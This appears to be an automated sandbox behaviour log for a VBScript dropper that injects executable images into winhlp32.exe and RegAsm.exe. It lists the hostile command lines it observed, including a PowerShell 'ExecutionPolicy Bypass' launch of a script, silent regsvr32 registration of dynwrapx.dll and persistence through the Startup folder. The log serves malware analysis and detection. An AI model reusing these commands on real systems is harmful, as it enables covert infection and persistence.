        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regions
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C37008Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: ECA008Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 10BC008Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 40E000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 410000Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: C33008Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 2C31008
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 29D3008
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 2BCF008
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 310E008
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 29B7008
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 268F008
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 2C59008
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 400000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 401000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 459000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 471000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 477000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 478000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 479000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 47E000
        Source: C:\Windows\SysWOW64\wscript.exeMemory written: C:\Windows\winhlp32.exe base: 2CCC008
        Source: C:\Windows\winhlp32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe17_2_004120F7
        Source: C:\Windows\winhlp32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe19_2_004120F7
        Source: C:\Windows\winhlp32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe21_2_004120F7
        Source: C:\Windows\winhlp32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe23_2_004120F7
        Source: C:\Windows\winhlp32.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe27_2_004120F7
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00419627 mouse_event,17_2_00419627
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\Desktop\lmg1_Mlakaifa443456.vbs"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"' & exitJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\remc1.vbs"'
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\SYSWOW64\WSCRIPT.EXE" //b //e:vbscript "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\remc1.vbs"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\user\AppData\Local\Temp\dynwrapx.dll"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\winhlp32.exe "C:\Windows\winhlp32.exe"
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3318000698.000000000550E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager@\]q&
        Source: RegAsm.exe, 00000004.00000002.3309788726.000000000309C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003069000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000004.00000002.3309788726.0000000003030000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerTe]q
        Source: C:\Windows\winhlp32.exeCode function: 17_2_00434C52 cpuid 17_2_00434C52
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,17_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,17_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,17_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,17_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,17_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,17_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,17_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,17_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,17_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,19_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,19_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,19_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,19_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,19_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,19_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,19_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,19_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,19_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,21_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,21_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,21_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,21_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,21_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,21_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,21_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,21_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,23_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,23_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,23_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,23_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,23_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,23_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,23_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,23_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,23_2_00451F9B
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00452036
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,27_2_004520C3
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,27_2_00452313
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00448404
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,27_2_0045243C
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,27_2_00452543
        Source: C:\Windows\winhlp32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,27_2_00452610
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoA,27_2_0040F8D1
        Source: C:\Windows\winhlp32.exeCode function: GetLocaleInfoW,27_2_004488ED
        Source: C:\Windows\winhlp32.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,27_2_00451CD8
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00451F50
        Source: C:\Windows\winhlp32.exeCode function: EnumSystemLocalesW,27_2_00451F9B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformationJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
